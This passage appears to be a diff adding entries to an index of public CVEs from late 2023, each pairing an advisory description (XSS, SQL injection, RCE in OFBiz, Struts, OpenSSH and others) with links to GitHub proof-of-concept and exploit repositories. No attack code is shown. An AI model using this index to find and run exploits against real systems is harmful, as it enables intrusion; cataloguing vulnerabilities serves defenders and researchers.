+A Cross-site scripting (XSS) vulnerability in login page php code in Armex ABO.CMS 5.9 allows remote attackers to inject arbitrary web script or HTML via the login.php? URL part.
+
+
+- [Shumerez/CVE-2023-48858](https://github.com/Shumerez/CVE-2023-48858)
+
+### CVE-2023-48866 (2023-12-04)
+
+A Cross-Site Scripting (XSS) vulnerability in the recipe preparation component within /api/objects/recipes and note component within /api/objects/shopping_lists/ of Grocy <= 4.0.3 allows attackers to obtain the victim's cookies.
+
+
+- [nitipoom-jar/CVE-2023-48866](https://github.com/nitipoom-jar/CVE-2023-48866)
+
+### CVE-2023-48974 (2024-02-08)
+
+Cross Site Scripting vulnerability in Axigen WebMail prior to 10.3.3.61 allows a remote attacker to escalate privileges via a crafted script to the serverName_input parameter.
+
+
+- [vinnie1717/CVE-2023-48974](https://github.com/vinnie1717/CVE-2023-48974)
+
+### CVE-2023-48981
+- [tristao-marinho/CVE-2023-48981](https://github.com/tristao-marinho/CVE-2023-48981)
+
+### CVE-2023-48982
+- [tristao-marinho/CVE-2023-48982](https://github.com/tristao-marinho/CVE-2023-48982)
+
+### CVE-2023-48983
+- [tristao-marinho/CVE-2023-48983](https://github.com/tristao-marinho/CVE-2023-48983)
+
+### CVE-2023-49000 (2023-12-27)
+
+An issue in ArtistScope ArtisBrowser v.34.1.5 and before allows an attacker to bypass intended access restrictions via interaction with the com.artis.browser.IntentReceiverActivity component.
+
+
+- [actuator/com.artis.browser](https://github.com/actuator/com.artis.browser)
+
+### CVE-2023-49001 (2023-12-27)
+
+An issue in Indi Browser (aka kvbrowser) v.12.11.23 allows an attacker to bypass intended access restrictions via interaction with the com.example.gurry.kvbrowswer.webview component.
+
+
+- [actuator/com.gurry.kvbrowser](https://github.com/actuator/com.gurry.kvbrowser)
+
+### CVE-2023-49002 (2023-12-27)
+
+An issue in Xenom Technologies (sinous) Phone Dialer-voice Call Dialer v.1.2.5 allows an attacker to bypass intended access restrictions via interaction with com.funprime.calldialer.ui.activities.OutgoingActivity.
+
+
+- [actuator/com.sinous.voice.dialer](https://github.com/actuator/com.sinous.voice.dialer)
+
+### CVE-2023-49003 (2023-12-27)
+
+An issue in simplemobiletools Simple Dialer 5.18.1 allows an attacker to bypass intended access restrictions via interaction with com.simplemobiletools.dialer.activities.DialerActivity.
+
+
+- [actuator/com.simplemobiletools.dialer](https://github.com/actuator/com.simplemobiletools.dialer)
+
+### CVE-2023-49038 (2024-01-29)
+
+Command injection in the ping utility on Buffalo LS210D 1.78-0.03 allows a remote authenticated attacker to inject arbitrary commands onto the NAS as root.
+
+
+- [christopher-pace/CVE-2023-49038](https://github.com/christopher-pace/CVE-2023-49038)
+
+### CVE-2023-49052 (2023-11-30)
+
+File Upload vulnerability in Microweber v.2.0.4 allows a remote attacker to execute arbitrary code via a crafted script to the file upload function in the created forms component.
+
+
+- [Cyber-Wo0dy/CVE-2023-49052](https://github.com/Cyber-Wo0dy/CVE-2023-49052)
+
+### CVE-2023-49070 (2023-12-05)
+
+\nPre-auth RCE in Apache Ofbiz 18.12.09.\n\nIt's due to XML-RPC no longer maintained still present.\nThis issue affects Apache OFBiz: before 18.12.10. \nUsers are recommended to upgrade to version 18.12.10\n\n
+
+
+- [abdoghazy2015/ofbiz-CVE-2023-49070-RCE-POC](https://github.com/abdoghazy2015/ofbiz-CVE-2023-49070-RCE-POC)
+- [0xrobiul/CVE-2023-49070](https://github.com/0xrobiul/CVE-2023-49070)
+- [D0g3-8Bit/OFBiz-Attack](https://github.com/D0g3-8Bit/OFBiz-Attack)
+- [UserConnecting/Exploit-CVE-2023-49070-and-CVE-2023-51467-Apache-OFBiz](https://github.com/UserConnecting/Exploit-CVE-2023-49070-and-CVE-2023-51467-Apache-OFBiz)
+- [yukselberkay/CVE-2023-49070_CVE-2023-51467](https://github.com/yukselberkay/CVE-2023-49070_CVE-2023-51467)
+- [Praison001/Apache-OFBiz-Auth-Bypass-and-RCE-Exploit-CVE-2023-49070-CVE-2023-51467](https://github.com/Praison001/Apache-OFBiz-Auth-Bypass-and-RCE-Exploit-CVE-2023-49070-CVE-2023-51467)
+
+### CVE-2023-49103 (2023-11-21)
+
+An issue was discovered in ownCloud owncloud/graphapi 0.2.x before 0.2.1 and 0.3.x before 0.3.1. The graphapi app relies on a third-party GetPhpInfo.php library that provides a URL. When this URL is accessed, it reveals the configuration details of the PHP environment (phpinfo). This information includes all the environment variables of the webserver. In containerized deployments, these environment variables may include sensitive data such as the ownCloud admin password, mail server credentials, and license key. Simply disabling the graphapi app does not eliminate the vulnerability. Additionally, phpinfo exposes various other potentially sensitive configuration details that could be exploited by an attacker to gather information about the system. Therefore, even if ownCloud is not running in a containerized environment, this vulnerability should still be a cause for concern. Note that Docker containers from before February 2023 are not vulnerable to the credential disclosure.
+
+
+- [creacitysec/CVE-2023-49103](https://github.com/creacitysec/CVE-2023-49103)
+- [MixColumns/CVE-2023-49103](https://github.com/MixColumns/CVE-2023-49103)
+- [merlin-ke/OwnCloud-CVE-2023-49103](https://github.com/merlin-ke/OwnCloud-CVE-2023-49103)
+
+### CVE-2023-49105 (2023-11-21)
+
+An issue was discovered in ownCloud owncloud/core before 10.13.1. An attacker can access, modify, or delete any file without authentication if the username of a victim is known, and the victim has no signing-key configured. This occurs because pre-signed URLs can be accepted even when no signing-key is configured for the owner of the files. The earliest affected version is 10.6.0.
+
+
+- [ambionics/owncloud-exploits](https://github.com/ambionics/owncloud-exploits)
+
+### CVE-2023-49313 (2023-11-28)
+
+A dylib injection vulnerability in XMachOViewer 0.04 allows attackers to compromise integrity. By exploiting this, unauthorized code can be injected into the product's processes, potentially leading to remote control and unauthorized access to sensitive user data.
+
+
+- [louiselalanne/CVE-2023-49313](https://github.com/louiselalanne/CVE-2023-49313)
+
+### CVE-2023-49314 (2023-11-28)
+
+Asana Desktop 2.1.0 on macOS allows code injection because of specific Electron Fuses. There is inadequate protection against code injection through settings such as RunAsNode and EnableNodeCliInspectArguments, and thus r3ggi/electroniz3r can be used to perform an attack.
+
+
+- [louiselalanne/CVE-2023-49314](https://github.com/louiselalanne/CVE-2023-49314)
+
+### CVE-2023-49339 (2024-02-13)
+
+Ellucian Banner 9.17 allows Insecure Direct Object Reference (IDOR) via a modified bannerId to the /StudentSelfService/ssb/studentCard/retrieveData endpoint.
+
+
+- [3zizme/CVE-2023-49339](https://github.com/3zizme/CVE-2023-49339)
+
+### CVE-2023-49438 (2023-12-26)
+
+An open redirect vulnerability in the python package Flask-Security-Too <=5.3.2 allows attackers to redirect unsuspecting users to malicious sites via a crafted URL by abusing the ?next parameter on the /login and /register routes.
+
+
+- [brandon-t-elliott/CVE-2023-49438](https://github.com/brandon-t-elliott/CVE-2023-49438)
+
+### CVE-2023-49453 (2024-03-12)
+
+Reflected cross-site scripting (XSS) vulnerability in Racktables v0.22.0 and before, allows local attackers to execute arbitrary code and obtain sensitive information via the search component in index.php.
+
+
+- [nitipoom-jar/CVE-2023-49453](https://github.com/nitipoom-jar/CVE-2023-49453)
+
+### CVE-2023-49471 (2024-01-10)
+
+Blind Server-Side Request Forgery (SSRF) vulnerability in karlomikus Bar Assistant before version 3.2.0 does not validate a parameter before making a request through Image::make(), which could allow authenticated remote attackers to execute arbitrary code.
+
+
+- [zunak/CVE-2023-49471](https://github.com/zunak/CVE-2023-49471)
+
+### CVE-2023-49496
+- [HuangYanQwQ/CVE-2023-49496](https://github.com/HuangYanQwQ/CVE-2023-49496)
+
+### CVE-2023-49539 (2024-03-01)
+
+Book Store Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability in /bsms_ci/index.php/category. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the category parameter.
+
+
+- [geraldoalcantara/CVE-2023-49539](https://github.com/geraldoalcantara/CVE-2023-49539)
+
+### CVE-2023-49540 (2024-03-01)
+
+Book Store Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability in /bsms_ci/index.php/history. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the history parameter.
+
+
+- [geraldoalcantara/CVE-2023-49540](https://github.com/geraldoalcantara/CVE-2023-49540)
+
+### CVE-2023-49543 (2024-03-01)
+
+Incorrect access control in Book Store Management System v1 allows attackers to access unauthorized pages and execute administrative functions without authenticating.
+
+
+- [geraldoalcantara/CVE-2023-49543](https://github.com/geraldoalcantara/CVE-2023-49543)
+
+### CVE-2023-49544 (2024-03-01)
+
+A local file inclusion (LFI) in Customer Support System v1 allows attackers to include internal PHP files and gain unauthorized acces via manipulation of the page= parameter at /customer_support/index.php.
+
+
+- [geraldoalcantara/CVE-2023-49544](https://github.com/geraldoalcantara/CVE-2023-49544)
+
+### CVE-2023-49545 (2024-03-01)
+
+A directory listing vulnerability in Customer Support System v1 allows attackers to list directories and sensitive files within the application without requiring authorization.
+
+
+- [geraldoalcantara/CVE-2023-49545](https://github.com/geraldoalcantara/CVE-2023-49545)
+
+### CVE-2023-49546 (2024-03-04)
+
+Customer Support System v1 was discovered to contain a SQL injection vulnerability via the email parameter at /customer_support/ajax.php.
+
+
+- [geraldoalcantara/CVE-2023-49546](https://github.com/geraldoalcantara/CVE-2023-49546)
+
+### CVE-2023-49547 (2024-03-04)
+
+Customer Support System v1 was discovered to contain a SQL injection vulnerability via the username parameter at /customer_support/ajax.php?action=login.
+
+
+- [geraldoalcantara/CVE-2023-49547](https://github.com/geraldoalcantara/CVE-2023-49547)
+
+### CVE-2023-49548 (2024-03-04)
+
+Customer Support System v1 was discovered to contain a SQL injection vulnerability via the lastname parameter at /customer_support/ajax.php?action=save_user.
+
+
+- [geraldoalcantara/CVE-2023-49548](https://github.com/geraldoalcantara/CVE-2023-49548)
+
+### CVE-2023-49606 (2024-05-01)
+
+A use-after-free vulnerability exists in the HTTP Connection Headers parsing in Tinyproxy 1.11.1 and Tinyproxy 1.10.0. A specially crafted HTTP header can trigger reuse of previously freed memory, which leads to memory corruption and could lead to remote code execution. An attacker needs to make an unauthenticated HTTP request to trigger this vulnerability.
+
+
+- [d0rb/CVE-2023-49606](https://github.com/d0rb/CVE-2023-49606)
+
+### CVE-2023-49950 (2024-02-03)
+
+The Jinja templating in Logpoint SIEM 6.10.0 through 7.x before 7.3.0 does not correctly sanitize log data being displayed when using a custom Jinja template in the Alert view. A remote attacker can craft a cross-site scripting (XSS) payload and send it to any system or device that sends logs to the SIEM. If an alert is created, the payload will execute upon the alert data being viewed with that template, which can lead to sensitive data disclosure.
+
+
+- [shrikeinfosec/cve-2023-49950](https://github.com/shrikeinfosec/cve-2023-49950)
+
+### CVE-2023-49954 (2023-12-25)
+
+The CRM Integration in 3CX before 18.0.9.23 and 20 before 20.0.0.1494 allows SQL Injection via a first name, search string, or email address.
+
+
+- [CVE-2023-49954/CVE-2023-49954.github.io](https://github.com/CVE-2023-49954/CVE-2023-49954.github.io)
+
+### CVE-2023-49964 (2023-12-11)
+
+An issue was discovered in Hyland Alfresco Community Edition through 7.2.0. By inserting malicious content in the folder.get.html.ftl file, an attacker may perform SSTI (Server-Side Template Injection) attacks, which can leverage FreeMarker exposed objects to bypass restrictions and achieve RCE (Remote Code Execution). NOTE: this issue exists because of an incomplete fix for CVE-2020-12873.
+
+
+- [mbadanoiu/CVE-2023-49964](https://github.com/mbadanoiu/CVE-2023-49964)
+
+### CVE-2023-49965 (2024-04-05)
+
+SpaceX Starlink Wi-Fi router Gen 2 before 2023.48.0 allows XSS via the ssid and password parameters on the Setup Page.
+
+
+- [hackintoanetwork/SpaceX-Starlink-Router-Gen-2-XSS](https://github.com/hackintoanetwork/SpaceX-Starlink-Router-Gen-2-XSS)
+
+### CVE-2023-49968 (2024-03-04)
+
+Customer Support System v1 was discovered to contain a SQL injection vulnerability via the id parameter at /customer_support/manage_department.php.
+
+
+- [geraldoalcantara/CVE-2023-49968](https://github.com/geraldoalcantara/CVE-2023-49968)
+
+### CVE-2023-49969 (2024-03-04)
+
+Customer Support System v1 was discovered to contain a SQL injection vulnerability via the id parameter at /customer_support/index.php?page=edit_customer.
+
+
+- [geraldoalcantara/CVE-2023-49969](https://github.com/geraldoalcantara/CVE-2023-49969)
+
+### CVE-2023-49970 (2024-03-04)
+
+Customer Support System v1 was discovered to contain a SQL injection vulnerability via the subject parameter at /customer_support/ajax.php?action=save_ticket.
+
+
+- [geraldoalcantara/CVE-2023-49970](https://github.com/geraldoalcantara/CVE-2023-49970)
+
+### CVE-2023-49971 (2024-03-06)
+
+A cross-site scripting (XSS) vulnerability in Customer Support System v1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the firstname parameter at /customer_support/index.php?page=customer_list.
+
+
+- [geraldoalcantara/CVE-2023-49971](https://github.com/geraldoalcantara/CVE-2023-49971)
+
+### CVE-2023-49973 (2024-03-06)
+
+A cross-site scripting (XSS) vulnerability in Customer Support System v1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the email parameter at /customer_support/index.php?page=customer_list.
+
+
+- [geraldoalcantara/CVE-2023-49973](https://github.com/geraldoalcantara/CVE-2023-49973)
+
+### CVE-2023-49974 (2024-03-06)
+
+A cross-site scripting (XSS) vulnerability in Customer Support System v1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the contact parameter at /customer_support/index.php?page=customer_list.
+
+
+- [geraldoalcantara/CVE-2023-49974](https://github.com/geraldoalcantara/CVE-2023-49974)
+
+### CVE-2023-49976 (2024-03-06)
+
+A cross-site scripting (XSS) vulnerability in Customer Support System v1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the subject parameter at /customer_support/index.php?page=new_ticket.
+
+
+- [geraldoalcantara/CVE-2023-49976](https://github.com/geraldoalcantara/CVE-2023-49976)
+
+### CVE-2023-49977 (2024-03-06)
+
+A cross-site scripting (XSS) vulnerability in Customer Support System v1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the address parameter at /customer_support/index.php?page=new_customer.
+
+
+- [geraldoalcantara/CVE-2023-49977](https://github.com/geraldoalcantara/CVE-2023-49977)
+
+### CVE-2023-49978 (2024-03-06)
+
+Incorrect access control in Customer Support System v1 allows non-administrator users to access administrative pages and execute actions reserved for administrators.
+
+
+- [geraldoalcantara/CVE-2023-49978](https://github.com/geraldoalcantara/CVE-2023-49978)
+
+### CVE-2023-49979 (2024-03-06)
+
+A directory listing vulnerability in Customer Support System v1 allows attackers to list directories and sensitive files within the application without requiring authorization.
+
+
+- [geraldoalcantara/CVE-2023-49979](https://github.com/geraldoalcantara/CVE-2023-49979)
+
+### CVE-2023-49980 (2024-03-06)
+
+A directory listing vulnerability in Best Student Result Management System v1.0 allows attackers to list directories and sensitive files within the application without requiring authorization.
+
+
+- [geraldoalcantara/CVE-2023-49980](https://github.com/geraldoalcantara/CVE-2023-49980)
+
+### CVE-2023-49981 (2024-03-06)
+
+A directory listing vulnerability in School Fees Management System v1.0 allows attackers to list directories and sensitive files within the application without requiring authorization.
+
+
+- [geraldoalcantara/CVE-2023-49981](https://github.com/geraldoalcantara/CVE-2023-49981)
+
+### CVE-2023-49982 (2024-03-06)
+
+Broken access control in the component /admin/management/users of School Fees Management System v1.0 allows attackers to escalate privileges and perform Administrative actions, including adding and deleting user accounts.
+
+
+- [geraldoalcantara/CVE-2023-49982](https://github.com/geraldoalcantara/CVE-2023-49982)
+
+### CVE-2023-49983 (2024-03-06)
+
+A cross-site scripting (XSS) vulnerability in the component /management/class of School Fees Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the name parameter.
+
+
+- [geraldoalcantara/CVE-2023-49983](https://github.com/geraldoalcantara/CVE-2023-49983)
+
+### CVE-2023-49984 (2024-03-06)
+
+A cross-site scripting (XSS) vulnerability in the component /management/settings of School Fees Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the name parameter.
+
+
+- [geraldoalcantara/CVE-2023-49984](https://github.com/geraldoalcantara/CVE-2023-49984)
+
+### CVE-2023-49985 (2024-03-06)
+
+A cross-site scripting (XSS) vulnerability in the component /management/class of School Fees Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the cname parameter.
+
+
+- [geraldoalcantara/CVE-2023-49985](https://github.com/geraldoalcantara/CVE-2023-49985)
+
+### CVE-2023-49986 (2024-03-07)
+
+A cross-site scripting (XSS) vulnerability in the component /admin/parent of School Fees Management System 1.0 allow attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the name parameter.
+
+
+- [geraldoalcantara/CVE-2023-49986](https://github.com/geraldoalcantara/CVE-2023-49986)
+
+### CVE-2023-49987 (2024-03-07)
+
+A cross-site scripting (XSS) vulnerability in the component /management/term of School Fees Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the tname parameter.
+
+
+- [geraldoalcantara/CVE-2023-49987](https://github.com/geraldoalcantara/CVE-2023-49987)
+
+### CVE-2023-49988 (2024-03-07)
+
+Hotel Booking Management v1.0 was discovered to contain a SQL injection vulnerability via the npss parameter at rooms.php.
+
+
+- [geraldoalcantara/CVE-2023-49988](https://github.com/geraldoalcantara/CVE-2023-49988)
+
+### CVE-2023-49989 (2024-03-07)
+
+Hotel Booking Management v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at update.php.
+
+
+- [geraldoalcantara/CVE-2023-49989](https://github.com/geraldoalcantara/CVE-2023-49989)
+
+### CVE-2023-50029 (2024-06-24)
+
+PHP Injection vulnerability in the module "M4 PDF Extensions" (m4pdf) up to version 3.3.2 from PrestaAddons for PrestaShop allows attackers to run arbitrary code via the M4PDF::saveTemplate() method.
+
+
+- [absholi7ly/PHP-Injection-in-M4-PDF-Extensions](https://github.com/absholi7ly/PHP-Injection-in-M4-PDF-Extensions)
+
+### CVE-2023-50070 (2023-12-29)
+
+Sourcecodester Customer Support System 1.0 has multiple SQL injection vulnerabilities in /customer_support/ajax.php?action=save_ticket via department_id, customer_id, and subject.
+
+
+- [geraldoalcantara/CVE-2023-50070](https://github.com/geraldoalcantara/CVE-2023-50070)
+
+### CVE-2023-50071 (2023-12-29)
+
+Sourcecodester Customer Support System 1.0 has multiple SQL injection vulnerabilities in /customer_support/ajax.php?action=save_department via id or name.
+
+
+- [geraldoalcantara/CVE-2023-50071](https://github.com/geraldoalcantara/CVE-2023-50071)
+
+### CVE-2023-50072 (2024-01-13)
+
+A Stored Cross-Site Scripting (XSS) vulnerability exists in OpenKM version 7.1.40 (dbb6e88) With Professional Extension that allows an authenticated user to upload a note on a file which acts as a stored XSS payload. Any user who opens the note of a document file will trigger the XSS.
+
+
+- [ahrixia/CVE-2023-50072](https://github.com/ahrixia/CVE-2023-50072)
+
+### CVE-2023-50131
+- [sajaljat/CVE-2023-50131](https://github.com/sajaljat/CVE-2023-50131)
+
+### CVE-2023-50132
+- [sajaljat/CVE-2023-50132](https://github.com/sajaljat/CVE-2023-50132)
+
+### CVE-2023-50164 (2023-12-07)
+
+An attacker can manipulate file upload params to enable paths traversal and under some circumstances this can lead to uploading a malicious file which can be used to perform Remote Code Execution.\nUsers are recommended to upgrade to versions Struts 2.5.33 or Struts 6.3.0.2 or greater to fix this issue.\n
+
+
+- [jakabakos/CVE-2023-50164-Apache-Struts-RCE](https://github.com/jakabakos/CVE-2023-50164-Apache-Struts-RCE)
+- [bcdannyboy/CVE-2023-50164](https://github.com/bcdannyboy/CVE-2023-50164)
+- [dwisiswant0/cve-2023-50164-poc](https://github.com/dwisiswant0/cve-2023-50164-poc)
+- [helsecert/cve-2023-50164](https://github.com/helsecert/cve-2023-50164)
+- [Thirukrishnan/CVE-2023-50164-Apache-Struts-RCE](https://github.com/Thirukrishnan/CVE-2023-50164-Apache-Struts-RCE)
+- [Trackflaw/CVE-2023-50164-ApacheStruts2-Docker](https://github.com/Trackflaw/CVE-2023-50164-ApacheStruts2-Docker)
+- [miles3719/cve-2023-50164](https://github.com/miles3719/cve-2023-50164)
+- [aaronm-sysdig/cve-2023-50164](https://github.com/aaronm-sysdig/cve-2023-50164)
+- [snyk-labs/CVE-2023-50164-POC](https://github.com/snyk-labs/CVE-2023-50164-POC)
+- [sunnyvale-it/CVE-2023-50164-PoC](https://github.com/sunnyvale-it/CVE-2023-50164-PoC)
+- [AsfandAliMemon25/CVE-2023-50164Analysis-](https://github.com/AsfandAliMemon25/CVE-2023-50164Analysis-)
+
+### CVE-2023-50226 (2024-05-03)
+
+Parallels Desktop Updater Link Following Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Parallels Desktop. An attacker must first obtain the ability to execute low-privileged code on the target host system in order to exploit this vulnerability.\n\nThe specific flaw exists within the Updater service. By creating a symbolic link, an attacker can abuse the service to move arbitrary files. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of root. Was ZDI-CAN-21227.
+
+
+- [kn32/parallels-file-move-privesc](https://github.com/kn32/parallels-file-move-privesc)
+
+### CVE-2023-50254 (2023-12-22)
+
+Deepin Linux's default document reader `deepin-reader` software suffers from a serious vulnerability in versions prior to 6.0.7 due to a design flaw that leads to remote command execution via crafted docx document. This is a file overwrite vulnerability. Remote code execution (RCE) can be achieved by overwriting files like .bash_rc, .bash_login, etc. RCE will be triggered when the user opens the terminal. Version 6.0.7 contains a patch for the issue.
+
+
+- [febinrev/deepin-linux_reader_RCE-exploit](https://github.com/febinrev/deepin-linux_reader_RCE-exploit)
+
+### CVE-2023-50386 (2024-02-09)
+
+Improper Control of Dynamically-Managed Code Resources, Unrestricted Upload of File with Dangerous Type, Inclusion of Functionality from Untrusted Control Sphere vulnerability in Apache Solr.This issue affects Apache Solr: from 6.0.0 through 8.11.2, from 9.0.0 before 9.4.1.\n\nIn the affected versions, Solr ConfigSets accepted Java jar and class files to be uploaded through the ConfigSets API.\nWhen backing up Solr Collections, these configSet files would be saved to disk when using the LocalFileSystemRepository (the default for backups).\nIf the backup was saved to a directory that Solr uses in its ClassPath/ClassLoaders, then the jar and class files would be available to use with any ConfigSet, trusted or untrusted.\n\nWhen Solr is run in a secure way (Authorization enabled), as is strongly suggested, this vulnerability is limited to extending the Backup permissions with the ability to add libraries.\nUsers are recommended to upgrade to version 8.11.3 or 9.4.1, which fix the issue.\nIn these versions, the following protections have been added:\n\n * Users are no longer able to upload files to a configSet that could be executed via a Java ClassLoader.\n * The Backup API restricts saving backups to directories that are used in the ClassLoader.\n\n
+
+
+- [vvmdx/Apache-Solr-RCE_CVE-2023-50386_POC](https://github.com/vvmdx/Apache-Solr-RCE_CVE-2023-50386_POC)
+
+### CVE-2023-50387 (2024-02-14)
+
+Certain DNSSEC aspects of the DNS protocol (in RFC 4033, 4034, 4035, 6840, and related RFCs) allow remote attackers to cause a denial of service (CPU consumption) via one or more DNSSEC responses, aka the "KeyTrap" issue. One of the concerns is that, when there is a zone with many DNSKEY and RRSIG records, the protocol specification implies that an algorithm must evaluate all combinations of DNSKEY and RRSIG records.
+
+
+- [knqyf263/CVE-2023-50387](https://github.com/knqyf263/CVE-2023-50387)
+- [Meirelez/SSR-DNSSEC](https://github.com/Meirelez/SSR-DNSSEC)
+
+### CVE-2023-50465 (2023-12-11)
+
+A stored cross-site scripting (XSS) vulnerability exists in Monica (aka MonicaHQ) 4.0.0 via an SVG document uploaded by an authenticated user.
+
+
+- [Ev3rR3d/CVE-2023-50465](https://github.com/Ev3rR3d/CVE-2023-50465)
+
+### CVE-2023-50596
+- [chandraprarikraj/CVE-2023-50596](https://github.com/chandraprarikraj/CVE-2023-50596)
+
+### CVE-2023-50643 (2024-01-09)
+
+An issue in Evernote Evernote for MacOS v.10.68.2 allows a remote attacker to execute arbitrary code via the RunAsNode and enableNodeClilnspectArguments components.
+
+
+- [giovannipajeu1/CVE-2023-50643](https://github.com/giovannipajeu1/CVE-2023-50643)
+
+### CVE-2023-50685 (2024-05-02)
+
+An issue in Hipcam Cameras RealServer v.1.0 allows a remote attacker to cause a denial of service via a crafted script to the client_port parameter.
+
+
+- [UnderwaterCoder/Hipcam-RTSP-Format-Validation-Vulnerability](https://github.com/UnderwaterCoder/Hipcam-RTSP-Format-Validation-Vulnerability)
+
+### CVE-2023-50868 (2024-02-14)
+
+The Closest Encloser Proof aspect of the DNS protocol (in RFC 5155 when RFC 9276 guidance is skipped) allows remote attackers to cause a denial of service (CPU consumption for SHA-1 computations) via DNSSEC responses in a random subdomain attack, aka the "NSEC3" issue. The RFC 5155 specification implies that an algorithm must perform thousands of iterations of a hash function in certain situations.
+
+
+- [Goethe-Universitat-Cybersecurity/NSEC3-Encloser-Attack](https://github.com/Goethe-Universitat-Cybersecurity/NSEC3-Encloser-Attack)
+
+### CVE-2023-50917 (2023-12-15)
+
+MajorDoMo (aka Major Domestic Module) before 0662e5e allows command execution via thumb.php shell metacharacters. NOTE: this is unrelated to the Majordomo mailing-list manager.
+
+
+- [Chocapikk/CVE-2023-50917](https://github.com/Chocapikk/CVE-2023-50917)
+
+### CVE-2023-51000
+- [Team-Byerus/CVE-2023-51000](https://github.com/Team-Byerus/CVE-2023-51000)
+
+### CVE-2023-51073 (2024-01-11)
+
+An issue in Buffalo LS210D v.1.78-0.03 allows a remote attacker to execute arbitrary code via the Firmware Update Script at /etc/init.d/update_notifications.sh.
+
+
+- [christopher-pace/CVE-2023-51073](https://github.com/christopher-pace/CVE-2023-51073)
+
+### CVE-2023-51119
+- [OscarAkaElvis/CVE-2023-51119](https://github.com/OscarAkaElvis/CVE-2023-51119)
+
+### CVE-2023-51126 (2024-01-10)
+
+Command injection vulnerability in /usr/www/res.php in FLIR AX8 up to 1.46.16 allows attackers to run arbitrary commands via the value parameter.
+
+
+- [risuxx/CVE-2023-51126](https://github.com/risuxx/CVE-2023-51126)
+
+### CVE-2023-51127 (2024-01-10)
+
+FLIR AX8 thermal sensor cameras up to and including 1.46.16 are vulnerable to Directory Traversal due to improper access restriction. This vulnerability allows an unauthenticated, remote attacker to obtain arbitrary sensitive file contents by uploading a specially crafted symbolic link file.
+
+
+- [risuxx/CVE-2023-51127](https://github.com/risuxx/CVE-2023-51127)
+
+### CVE-2023-51214
+- [chandraprarikraj/CVE-2023-51214](https://github.com/chandraprarikraj/CVE-2023-51214)
+
+### CVE-2023-51281 (2024-03-07)
+
+Cross Site Scripting vulnerability in Customer Support System v.1.0 allows a remote attacker to escalate privileges via a crafted script firstname, "lastname", "middlename", "contact" and address parameters.
+
+
+- [geraldoalcantara/CVE-2023-51281](https://github.com/geraldoalcantara/CVE-2023-51281)
+
+### CVE-2023-51385 (2023-12-18)
+
+In ssh in OpenSSH before 9.6, OS command injection might occur if a user name or host name has shell metacharacters, and this name is referenced by an expansion token in certain situations. For example, an untrusted Git repository can have a submodule with shell metacharacters in a user name or host name.
+
+
+- [vin01/poc-proxycommand-vulnerable](https://github.com/vin01/poc-proxycommand-vulnerable)
+- [FeatherStark/CVE-2023-51385](https://github.com/FeatherStark/CVE-2023-51385)
+- [watarium/poc-cve-2023-51385](https://github.com/watarium/poc-cve-2023-51385)
+- [Le1a/CVE-2023-51385](https://github.com/Le1a/CVE-2023-51385)
+- [LtmThink/CVE-2023-51385_test](https://github.com/LtmThink/CVE-2023-51385_test)
+- [WLaoDuo/CVE-2023-51385_poc-test](https://github.com/WLaoDuo/CVE-2023-51385_poc-test)
+- [N0rther/CVE-2023-51385_TT](https://github.com/N0rther/CVE-2023-51385_TT)
+- [power1314520/CVE-2023-51385_test](https://github.com/power1314520/CVE-2023-51385_test)
+- [WOOOOONG/CVE-2023-51385](https://github.com/WOOOOONG/CVE-2023-51385)
+- [uccu99/CVE-2023-51385](https://github.com/uccu99/CVE-2023-51385)
+- [julienbrs/exploit-CVE-2023-51385](https://github.com/julienbrs/exploit-CVE-2023-51385)
+- [julienbrs/malicious-exploit-CVE-2023-51385](https://github.com/julienbrs/malicious-exploit-CVE-2023-51385)
+- [Sonicrrrr/CVE-2023-51385](https://github.com/Sonicrrrr/CVE-2023-51385)
+- [farliy-hacker/CVE-2023-51385](https://github.com/farliy-hacker/CVE-2023-51385)
+- [farliy-hacker/CVE-2023-51385-save](https://github.com/farliy-hacker/CVE-2023-51385-save)
+- [2048JiaLi/CVE-2023-51385](https://github.com/2048JiaLi/CVE-2023-51385)
+- [thinkliving2020/CVE-2023-51385-](https://github.com/thinkliving2020/CVE-2023-51385-)
+- [c0deur/CVE-2023-51385](https://github.com/c0deur/CVE-2023-51385)
+- [endasugrue/CVE-2023-51385_poc](https://github.com/endasugrue/CVE-2023-51385_poc)
+- [MiningBot-eth/CVE-2023-51385-exploit](https://github.com/MiningBot-eth/CVE-2023-51385-exploit)
+
+### CVE-2023-51409 (2024-04-12)
+
+Unrestricted Upload of File with Dangerous Type vulnerability in Jordy Meow AI Engine: ChatGPT Chatbot.This issue affects AI Engine: ChatGPT Chatbot: from n/a through 1.9.98.\n\n
+
+
+- [RandomRobbieBF/CVE-2023-51409](https://github.com/RandomRobbieBF/CVE-2023-51409)
+- [imhunterand/CVE-2023-51409](https://github.com/imhunterand/CVE-2023-51409)
+
+### CVE-2023-51448 (2023-12-22)
+
+Cacti provides an operational monitoring and fault management framework. Version 1.2.25 has a Blind SQL Injection (SQLi) vulnerability within the SNMP Notification Receivers feature in the file `‘managers.php’`. An authenticated attacker with the “Settings/Utilities” permission can send a crafted HTTP GET request to the endpoint `‘/cacti/managers.php’` with an SQLi payload in the `‘selected_graphs_array’` HTTP GET parameter. As of time of publication, no patched versions exist.
+
+
+- [jakabakos/CVE-2023-51448-cacti-sqli-poc](https://github.com/jakabakos/CVE-2023-51448-cacti-sqli-poc)
+
+### CVE-2023-51467 (2023-12-26)
+
+The vulnerability permits attackers to circumvent authentication processes, enabling them to remotely execute arbitrary code\n\n
+
+
+- [JaneMandy/CVE-2023-51467](https://github.com/JaneMandy/CVE-2023-51467)
